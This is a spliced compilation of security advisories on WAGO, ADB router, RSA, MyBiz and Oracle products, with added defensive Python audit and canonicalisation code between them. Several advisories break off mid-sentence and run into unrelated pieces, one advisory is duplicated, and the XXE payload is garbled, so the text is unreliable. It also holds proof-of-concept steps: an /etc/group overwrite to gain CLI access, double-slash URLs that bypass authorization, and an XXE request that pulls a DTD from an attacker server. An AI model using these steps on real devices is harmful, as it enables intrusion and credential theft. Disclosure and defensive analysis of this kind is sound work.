A stored cross-site scripting vulnerability was identified within the "PLC List" which can be configured in the web interface of the e!DISPLAY. By storing a payload there, an administrative or guest user can be attacked without tricking them into visiting a malicious web site or clicking on a malicious link. This vulnerability is only present for authenticated users!
3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even possible to change the location of the uploaded file on the system. As the web service does not run as a privileged user, it is not possible to upload a file directly to the web root, but many other locations on the file system can be written. The normal user 'user' and the administrative user 'admin' can both upload files to the system.

4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions, a file in the web root can be overwritten by the unprivileged 'www' user. This is the same user which is used in the context of the web server.

5) Remote code execution via
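The check a practitioner would run for issue 4, as an added example that is not WAGO's code and not part of the advisory: a file in the web root that the web server's own account can write is what turns an "upload somewhere" primitive like issue 3 into served attacker code. The walker applies the POSIX discretionary rule (owner bits, else group bits, else other bits) for a given uid and group set; the 'www' uid/gid values and the sample tree are assumptions constructed for this illustration.

```python
"""Report everything under a web root that a given uid/gid set may modify."""
import os
import stat
import tempfile

WWW_UID, WWW_GID = 33, 33     # assumed ids of the 'www' account; check /etc/passwd on the device


def writable_by(st_mode: int, st_uid: int, st_gid: int, uid: int, gids) -> bool:
    """POSIX mode-bit check; ACLs and capabilities are outside its scope and must be audited separately."""
    if uid == 0:
        return True
    if st_uid == uid:
        return bool(st_mode & stat.S_IWUSR)
    if st_gid in set(gids):
        return bool(st_mode & stat.S_IWGRP)
    return bool(st_mode & stat.S_IWOTH)


def audit_webroot(root: str, uid: int = WWW_UID, gids=(WWW_GID,)) -> list:
    """Paths under ``root`` the identity could change.

    Writable directories are reported too: the server user can then replace a
    read-only file in them by rename, which is just as good as overwriting it.
    """
    findings = []
    gids = set(gids)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)               # lstat: never follow symlinks out of the root
            if stat.S_ISLNK(st.st_mode):
                continue
            if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gids):
                findings.append(path)
    return sorted(findings)


def demo_tree() -> str:
    """Constructed sample web root: one page and one script in a subdirectory."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    os.mkdir(os.path.join(root, "cgi"))
    for rel in ("index.html", os.path.join("cgi", "status.php")):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("placeholder\n")
    return root
```

Run it on the device as audit_webroot("/path/to/webroot") with the real uid and supplementary groups of the web server process; every reported path is one the vendor's fix (correct ownership and 0644/0755 with a non-'www' owner) has to cover.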
SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities, which have been split up for better readability:
Local root: https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/
Authorization bypass: https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers (based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13110
impact: critical
homepage: http://www.adbglobal.com
found: 2016-07-11
by: Stefan Viehböck (Office Vienna)
    Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation:
By exploiting the group manipulation vulnerability on affected and unpatched devices an attacker is able to gain access to the command line interface (CLI) even if the ISP has disabled it. Depending on the feature set of the CLI (ISP dependent) it is then possible to read the whole configuration, manipulate settings in the web GUI and escalate privileges to the highest access rights.
SEC Consult highly recommends a thorough security review of this platform by security professionals. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to gain access to the CLI (even if it has been disabled by the configuration) and escalate his privileges. Depending on the CLI features it is possible to extract the whole configuration and manipulate settings, or to gain access to debug features of the device, e.g. via the "debug", "upgrade", "upload" etc. commands in the CLI. Attackers can gain access to sensitive configuration data such as VoIP credentials or other information and manipulate any settings of the device.

Proof of concept:
-
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
Membership in the local Linux groups "remoteaccess" and "localaccess" (in /etc/group) defines who may use Telnet or SSH on the ADB devices. The group name setting of "Storage users" in the web GUI is not checked against existing groups, so an attacker can create a storage group with one of these names and overwrite the real entry in /etc/group. It may be possible to overwrite the "root" group as well, but this might brick the device, and the default user is already a member of the "root" group; hence this attack has not been tested further.
The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
   http://$IP/ui/dboard/storage/storageusers?backto=storage
   This generates the following new entry in /etc/group; the original "localaccess" group is overwritten:
   localaccess:Storage Group:5001:
b) Then delete this group via the web GUI again; the entry is removed from /etc/group completely.
c) Afterwards, create the following new group name entry via the web GUI and add your user account (e.g. admin) wh
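What the device should have checked, and how to spot the manipulation afterwards, as an added example that is not ADB firmware code: the access group names and the displaced entry "localaccess:Storage Group:5001:" are from the advisory; the GID range for GUI-created storage groups, the name rule and the sample /etc/group contents are assumptions constructed for this illustration.

```python
"""/etc/group: reject colliding storage-group names; audit for displaced access groups."""
from dataclasses import dataclass

ACCESS_GROUPS = {"remoteaccess", "localaccess"}   # groups named in the advisory
STORAGE_GID_FLOOR = 5000                            # assumed: GUI-created groups get gids from here

# Constructed samples mirroring the advisory's steps.
HEALTHY = "root:x:0:admin\nwww:x:33:\nlocalaccess:x:100:\nremoteaccess:x:101:\n"
AFTER_OVERWRITE = "root:x:0:admin\nwww:x:33:\nlocalaccess:Storage Group:5001:\nremoteaccess:x:101:\n"
AFTER_DELETE = "root:x:0:admin\nwww:x:33:\nremoteaccess:x:101:\n"


@dataclass
class GroupEntry:
    name: str
    password: str
    gid: int
    members: list


def parse_group_file(text: str) -> list:
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 4:
            raise ValueError(f"line {lineno}: expected 4 fields, got {len(fields)}")
        name, password, gid, members = fields
        entries.append(GroupEntry(name, password, int(gid), [m for m in members.split(",") if m]))
    return entries


def audit_group_file(text: str) -> list:
    """Human-readable findings; an empty list means nothing looks manipulated."""
    entries = parse_group_file(text)
    findings, seen = [], {}
    for e in entries:
        if e.name in seen:
            findings.append(f"duplicate group {e.name!r}: gid {seen[e.name]} and {e.gid}")
        seen.setdefault(e.name, e.gid)
        if e.password not in ("", "x", "!", "*"):
            # the GUI's free-text description landed in the password field
            findings.append(f"group {e.name!r} has free text in the password field: {e.password!r}")
        if e.name in ACCESS_GROUPS and e.gid >= STORAGE_GID_FLOOR:
            findings.append(f"access group {e.name!r} carries a storage-range gid {e.gid}")
    for name in sorted(ACCESS_GROUPS - set(seen)):
        findings.append(f"access group {name!r} is missing (deleted via the GUI?)")
    return findings


def storage_group_name_allowed(name: str, existing: list) -> bool:
    """Server-side rule the GUI lacked: a storage group may not reuse any existing
    or access-control group name, and must look like an ordinary group name."""
    plain = name.replace("_", "a").replace("-", "a")
    if not name or len(name) > 32 or not plain.isalnum():
        return False
    if name in ACCESS_GROUPS or name == "root":
        return False
    return all(e.name != name for e in existing)
```

On a device, feed the audit function the real /etc/group (and compare against a known-good copy from firmware); the name rule belongs in the storage-user handler before anything is written to the file.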
SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities, which have been split up for better readability:
Local root: https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/
Privilege escalation: https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/

SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
title: Authorization Bypass
product: All ADB Broadband Gateways / Routers (based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13109
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-28
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation:
By exploiting the authorization bypass vulnerability on affected and unpatched devices an attacker is able to gain access to settings that are otherwise forbidden for the user, e.g. through strict settings set by the ISP. It is also possible to manipulate settings, e.g. to enable the telnet server for remote access if it had been disabled by the ISP. The attacker needs some user account for login, regardless of its permissions; e.g. the default one provided by the ISP or printed on the device can be used.
SEC Consult highly recommends a thorough security review of this platform by security professionals. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature set of the ISP deploying the ADB device, a standard user account may not have all settings enabled within the web GUI. An authenticated attacker is able to bypass those restrictions by adding a second slash in front of the forbidden entry in the URL path. It was possible to access forbidden entries within the first layer of the web GUI; further subsequent layers/paths (sub menus) could not be accessed during testing, but further exploitation can't be ruled out entirely.

Proof of concept:
-
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver
Adding a second slash in front of the blocked entry "telnetserver" enables full access, including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver
This works for many other settings within the web GUI!
In our tests it was not possible to access subsequent layers. E.g., assume that both the proxy menu and the submenu "rtsp" settings are blocked; a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp
Nevertheless, it can't be ruled out that sub menus can be accessed too when deeper tests are performed.

Vulnerable / tested versions:
-
The following devices & firmware have been tested, which were the most recent versions at the time of discovery. The firmware versions depend on the ISP / customer of ADB and may vary!
ADB P.RG AV4202N - E_
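Why a second slash gets past a menu ACL, and the fix, as an added example that is not the ADB firmware's code: the blocked paths are the ones from the advisory; the shape of the ACL table, the function names and the documentation address used in the test are assumptions for this illustration.

```python
"""Path-based authorization: compare the canonical path, not the raw one."""
import posixpath
from urllib.parse import unquote, urlsplit

# Assumed ISP policy: entries the standard user must not reach.
FORBIDDEN = {
    "/ui/dboard/settings/management/telnetserver",
    "/ui/dboard/settings/proxy",
    "/ui/dboard/settings/proxy/rtsp",
}


def allowed_naive(url: str) -> bool:
    """Exact string match on the raw path: any alternate spelling of the same resource slips through."""
    return urlsplit(url).path not in FORBIDDEN


def canonical_path(url: str) -> str:
    """One spelling per resource: percent-decode, collapse '//' and '.', resolve '..', drop trailing '/'."""
    path = unquote(urlsplit(url).path)
    while path.startswith("//"):          # posixpath.normpath keeps a leading '//'; we do not want that
        path = path[1:]
    path = posixpath.normpath(path)
    return path.rstrip("/") or "/"


def allowed_hardened(url: str) -> bool:
    """Authorize the canonical path, and deny everything below a forbidden entry as well.

    The router has to dispatch on the very same canonical string; if the ACL
    canonicalises but the router does not (or vice versa), the two disagree
    about which page a request means, and that disagreement is the bypass.
    """
    path = canonical_path(url)
    return not any(path == blocked or path.startswith(blocked + "/") for blocked in FORBIDDEN)
```

The naive check lets the advisory's double-slash URL through while the hardened one blocks it together with the "./", percent-encoded and trailing-slash spellings of the same entry.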
SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers
Also see our other two advisories regarding critical ADB vulnerabilities, which have been split up for better readability:
Authorization bypass: https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/
Privilege escalation: https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/

SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers (based on Epicentro platform)
vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
fixed version: see "Solution" section below
CVE number: CVE-2018-13108
impact: critical
homepage: http://www.adbglobal.com
found: 2016-06-09
by: Johannes Greil (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to reduce integration and service delivery challenges to increase ARPU and reduce churn. We combine ADB know-how and products with those from a number of third party industry leaders to deliver complete solutions that benefit from collaborative thinking and best in class technologies."
Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software for digital TV processors and expanded its business to the design and manufacture of digital TV equipment in 1997. The company sold its first set-top box in 1997 and since then has been delivering a number of set-top boxes, and Gateway devices, together with advanced software platforms. ADB has sold over 60 million devices worldwide to cable, satellite, IPTV and broadband operators. ADB employs over 500 people, of which 70% are in engineering functions."
Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast

Business recommendation:
By exploiting the local root vulnerability on affected and unpatched devices an attacker is able to gain full access to the device with highest privileges. Attackers are able to modify any settings that might otherwise have been prohibited by the ISP. It is possible to retrieve all stored user credentials (such as VoIP) or SSL private keys. Furthermore, attacks on the internal network side of the ISP are possible by using the device as a jump host, depending on the internal network security measures.
Network security should not depend on the security of independent devices, such as modems. An attacker with root access to such a device can mount attacks on connected networks, such as administrative networks managed by the ISP, or on other users.
SEC Consult highly recommends a thorough security review of this platform by security professionals. It is assumed that further critical vulnerabilities exist within the firmware of this device.

Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports so that customers can use them for printer or file sharing. In the past, ADB devices have suffered from symlink attacks, e.g. via the FTP server functionality, which has been fixed in more recent firmware versions.
The "Network File Sharing" feature of current ADB devices via USB uses a samba daemon which accesses the USB drive with highest access rights and exports the network shares with root user permissions. The default and hardcoded setting for the samba daemon in the smb.conf on the device is "wide links = no", which normally prevents gaining access to the root file system of the device through symlinks placed on a USB drive.
But an attacker is able to exploit both a web GUI input validation problem and a samba configuration file parsing problem, which together make it possible to access the root file system of the device with root access rights via a manipulated USB drive. The attacker can then edit various system files, e.g. passwd and the session information of the web server, in order to escalate web GUI privileges, start a telnet server and gain full system-level shell access as root.
This is a local attack and not possible via remote access vectors, as the attacker needs to insert a specially crafted USB drive into the device! Usually not even the ISPs themselves have direct root access on ADB devices, hence this attack is quite p
SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
===
title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
fixed version: 8.3 P1 and later
CVE number: CVE-2018-1247
impact: High
homepage: https://www.rsa.com
found: 2017-11-16
by: Mantas Juskauskas (Office Vilnius)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime."
Source: https://www.rsa.com/en-us/company/about

Business recommendation:
By exploiting the vulnerabilities documented in this advisory an attacker can obtain sensitive information from the RSA Authentication Manager file system, initiate arbitrary TCP connections or cause a DoS. In addition, clients of the RSA Authentication Manager can be affected by exploiting the client-side issues.
SEC Consult recommends to apply the available patches from the vendor.

Vulnerability overview/description:
---
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The XML parser in use resolves external entities, which allows an authenticated attacker (or an attacker who is able to trick an authenticated user into importing a malicious XML file) to read files, send requests to systems on the internal network (e.g. port scanning) or cause a DoS (e.g. billion laughs attack). This issue has been fixed by RSA as described in the advisory DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18).

2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input sufficiently.
This leads to a reflected cross-site scripting vulnerability: an attacker can inject arbitrary HTML or JavaScript code into the victim's web browser. Once the victim clicks a malicious link, the attacker's code is executed in the context of the victim's web browser. The vulnerability exists in a third party component called pmfso. This issue has been fixed by RSA as described in the advisory DSA-2018-082.

3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient validation before inserting it into the DOM. This can be exploited for reflected cross-site scripting. The identified issues exist in third party components. One of the affected components is PopCalendarX, which has an assigned CVE (CVE-2017-9072). This issue has been fixed by RSA as described in the advisory DSA-2018-082. Two further issues affecting other third party components are not yet fixed, as the third party vendor has not supplied a patch to RSA yet.

Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The Security Console of the RSA Authentication Manager allows authenticated users to import SecurID token jobs in XML format. By importing an XML file with malicious XML code into the application, it is possible to exploit a blind XXE vulnerability.
For example, in order to read arbitrary files from the RSA Authentication Manager OS, the following malicious XML file can be imported via the affected endpoint:
==
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: :7004
Cookie: [snip]
[snip]
-9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile"; filename="xxe_test.xml"
Content-Type: text/xml

/a.dtd">
-9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"
[snip]
==
In this case, the attacker has to host the defined a.dtd file in the web root of a controlled web server:
==
# cat /var/www/a.dtd
:8080/%p1;'>">
%p2;
==
Assuming that the RSA Authentication Manager OS has network level access to the TCP port 80 and 8080 of th
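The parser behaviour behind this PoC, and the setting that removes it, as an added example that is not RSA's code and does not reproduce the advisory's payload: a parser only "resolves" an external entity if its external-entity callback goes and fetches the SYSTEM identifier. Python's expat binding exposes that callback directly, so the vulnerable resolver (open the named file, splice it in through a child parser) and the hardened one (raise) can be shown side by side. The secret file and the import document are constructed here for the demonstration; a real payload would name file:///etc/passwd or an http:// URL on the attacker's host, which go through the same callback.

```python
"""External entity resolution: the behaviour behind XXE, and refusing it."""
import os
import tempfile
from xml.parsers import expat


class ExternalEntityBlocked(Exception):
    """Raised by the hardened parser when a document names an external entity."""


def write_secret_file(content: str = "SECRET-TOKEN-0042\n") -> str:
    """Stand-in for a file on the appliance the attacker wants to read (constructed)."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-", suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(content)
    return path


def build_import_doc(target_path: str) -> bytes:
    """A constructed 'import job' whose DOCTYPE declares an external general entity."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE job [ <!ENTITY xxe SYSTEM "{target_path}"> ]>\n'
        "<job><name>&xxe;</name></job>\n"
    ).encode()


def parse_text(doc: bytes, allow_external: bool) -> str:
    """Return the document's character data, resolving or refusing external entities."""
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def on_external_entity(context, base, system_id, public_id):
        if not allow_external:
            raise ExternalEntityBlocked(system_id)
        # Vulnerable behaviour: fetch whatever was named and parse it as part of
        # the document. The child parser inherits the handlers, so the file's
        # bytes end up in ``chunks`` exactly as if they had been in the upload.
        path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
        with open(path, "rb") as fh:
            child = parser.ExternalEntityParserCreate(context)
            child.Parse(fh.read(), True)
        return 1

    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(doc, True)
    return "".join(chunks)


def is_blocked(doc: bytes) -> bool:
    """True when the hardened parser refuses the document because of an external entity."""
    try:
        parse_text(doc, allow_external=False)
    except ExternalEntityBlocked:
        return True
    return False


def has_doctype(doc: bytes) -> bool:
    """Cheap boundary rule: a token-job import never needs a DTD, so reject any upload carrying one."""
    return b"<!DOCTYPE" in doc or b"<!ENTITY" in doc
```

With resolution enabled the secret's content shows up in the parsed text; with it refused the same document is rejected before anything is read. Blind variants like the advisory's (parameter entities pulling a DTD from the attacker's server) differ only in where the fetched data goes, not in the callback that fetches it, which is why the fix is a parser setting rather than output filtering.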
Re: SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
The following CVE numbers have been assigned now:
XSS issue: CVE-2018-11090
Arbitrary File Upload: CVE-2018-11091

On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
> ===
> title: Arbitrary File Upload & Cross-site scripting
> product: MyBiz MyProcureNet
> vulnerable version: 5.0.0
> fixed version: unknown
> CVE number: -
> impact: Critical
> homepage: http://www.mybiz.net/
> found: 2018-01-29
> by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
>     Fikri Fadzil (Office Singapore)
>     Wan Ikram (Office Kuala Lumpur)
>     Jasveer Singh (Office Kuala Lumpur)
> SEC Consult Vulnerability Lab
>
> An integrated part of SEC Consult
> Europe | Asia | North America
>
> https://www.sec-consult.com
>
> ===
>
> Vendor description:
> ---
> "MyBiz is a company fixated on developing technology which transforms the way
> business is done online. At the intersection of what one business needs from
> another is the potential for value to be created differently. This
> intersection for the exchange of value requires technology but in
> fundamentally very different ways from traditional enterprise systems. MyBiz
> believes that the chemistry of business is the business relationships between
> enterprises. The strength of the business relationship drives the success and
> future of the business. MyBiz believes that these business relationships need
> to be captured and orchestrated. MyBiz developed our proprietary Business
> Relationship Network engine, a platform to capture business relationships as
> data to drive new business services which create value efficiently."
>
> Source: http://www.mybiz.net/copy-of-our-story
>
>
> Business recommendation:
>
> The vendor did not reply to our inquiries since February 2018 hence the issues
> might still exist in current versions.
>
> SEC Consult recommends not to use this product until a thorough security review
> has been performed by security professionals and all identified issues have
> been resolved. It is assumed that MyBiz products are affected by further
> critical security issues.
>
>
> Vulnerability overview/description:
> ---
> The identified vulnerabilities can be exploited after authentication but
> the registration for the application is usually open for anyone.
>
> 1. Arbitrary File Upload
> A malicious file can be uploaded to the webserver by an attacker. It is
> possible for an attacker to upload a script to issue operating system
> commands.
>
> This vulnerability occurs because an attacker is able to adjust the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
> extensions to the whitelist during the upload.
>
> For instance, if the extension .asp is added to the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
> accepts "secctest.asp" as a legitimate file. Hence malicious files can be
> uploaded in order to execute arbitrary commands to take over the server.
>
>
> 2. Reflected Cross-site scripting
> This vulnerability within "ProxyPage.aspx" allows an attacker to inject
> malicious client side scripting which will be executed in the browser of
> users if they visit the manipulated site.
>
>
> Proof of concept:
> -
> The proof of concept has been removed as no patch is available.
>
>
> Vulnerable / tested versions:
> -
> MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable.
> This was the latest version available at the time of the test.
>
>
> Vendor contact timeline:
>
> 2018-02-22: Contacting vendor through i...@mybiz.net (no response)
> 2018-02-27: Request update from vendor (no response)
> 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
>             (no response)
> 2018-05-14: Public release of security advisory
>
>
> Solution:
> -----
> None
>
>
> Workaround:
> ---
> None
>
>
> Advisory URL:
> -
> https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
>
> ~~~~~~~~~~~~~~~~~~~~
SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet
SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
===
title: Arbitrary File Upload & Cross-site scripting
product: MyBiz MyProcureNet
vulnerable version: 5.0.0
fixed version: unknown
CVE number: -
impact: Critical
homepage: http://www.mybiz.net/
found: 2018-01-29
by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
    Fikri Fadzil (Office Singapore)
    Wan Ikram (Office Kuala Lumpur)
    Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"MyBiz is a company fixated on developing technology which transforms the way business is done online. At the intersection of what one business needs from another is the potential for value to be created differently. This intersection for the exchange of value requires technology but in fundamentally very different ways from traditional enterprise systems. MyBiz believes that the chemistry of business is the business relationships between enterprises. The strength of the business relationship drives the success and future of the business. MyBiz believes that these business relationships need to be captured and orchestrated. MyBiz developed our proprietary Business Relationship Network engine, a platform to capture business relationships as data to drive new business services which create value efficiently."
Source: http://www.mybiz.net/copy-of-our-story

Business recommendation:
The vendor did not reply to our inquiries since February 2018, hence the issues might still exist in current versions.
SEC Consult recommends not to use this product until a thorough security review has been performed by security professionals and all identified issues have been resolved. It is assumed that MyBiz products are affected by further critical security issues.

Vulnerability overview/description:
---
The identified vulnerabilities can be exploited after authentication, but registration for the application is usually open to anyone.

1. Arbitrary File Upload
A malicious file can be uploaded to the webserver by an attacker. It is possible for an attacker to upload a script to issue operating system commands.
This vulnerability occurs because the attacker is able to adjust the "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary extensions to the whitelist during the upload: the server derives its extension whitelist from a hidden form field under the client's control.
For instance, if the extension .asp is added to the "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server accepts "secctest.asp" as a legitimate file. Hence malicious files can be uploaded in order to execute arbitrary commands and take over the server.

2. Reflected Cross-site scripting
This vulnerability within "ProxyPage.aspx" allows an attacker to inject malicious client side scripting which will be executed in the browser of users if they visit the manipulated site.

Proof of concept:
-
The proof of concept has been removed as no patch is available.

Vulnerable / tested versions:
-
MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. This was the latest version available at the time of the test.

Vendor contact timeline:
2018-02-22: Contacting vendor through i...@mybiz.net (no response)
2018-02-27: Request update from vendor (no response)
2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us (no response)
2018-05-14: Public release of security advisory

Solution:
-
None

Workaround:
---
None

Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendations about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC C
SEC Consult SA-20180503-0 :: Authentication Bypass in Oracle Access Manager (OAM)
We have published an accompanying blog post to this technical advisory with further information:
Blog: https://www.sec-consult.com/en/blog/2018/05/oracle-access-managers-identity-crisis/
Demo video: https://www.youtube.com/watch?v=YK7_1NozAwQ

SEC Consult Vulnerability Lab Security Advisory < 20180503-0 >
===
title: Authentication Bypass
product: Oracle Access Manager
vulnerable version: 11.1.2.3.0, 12.2.1.3.0
fixed version: April 2018 CPU
CVE number: CVE-2018-2879
impact: Critical
homepage: https://www.oracle.com/
found: 2017-11
by: W. Ettlinger (Office Vienna)

SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Oracle Access Management provides innovative new services that complement traditional access management capabilities. It not only provides Web SSO with MFA, coarse grained authorization and session management but also provides standard SAML Federation and OAuth capabilities to enable secure access to external cloud and mobile applications. It can be easily integrated with the Oracle Identity Cloud Service to support hybrid access management capabilities that can help customers to seamlessly protect on-premise and cloud applications and workloads."

URL: http://www.oracle.com/technetwork/middleware/id-mgmt/index-090417.html

Business recommendation:
SEC Consult did not conduct a full security audit as only a cryptographic implementation was analyzed. However, since the vulnerability was found in such a central component of the OAM, we suspect that an insufficient amount of attention has been given to information security. Given the central position in an organization's security infrastructure, we recommend Oracle's customers to either conduct a full audit of the component or to request the results of such audits from Oracle.

The security patches from the Oracle CPU April 2018 have to be applied immediately!
Vulnerability overview/description:
---
Due to an improper usage of the CBC encryption mode, Oracle Access Manager (OAM) is vulnerable to an authentication bypass vulnerability. An attacker can abuse this vulnerability to log in to any resource protected by the OAM using any user account, even administrative accounts! This security vulnerability completely breaks the main functionality of the OAM product.

An attacker can create a scenario in which the OAM replies differently depending on whether the PKCS#7 padding of an encrypted message is valid or invalid. This behavior can be used to mount a padding oracle attack. An attacker can decrypt and encrypt several messages used to communicate between the OAM and web servers. The attack described here allows an attacker to create arbitrary authentication cookies which are accepted by the OAM.

Proof of concept:
-
A successful user authentication with Oracle Access Manager (OAM) involves the following steps:

1. The user accesses a protected resource.
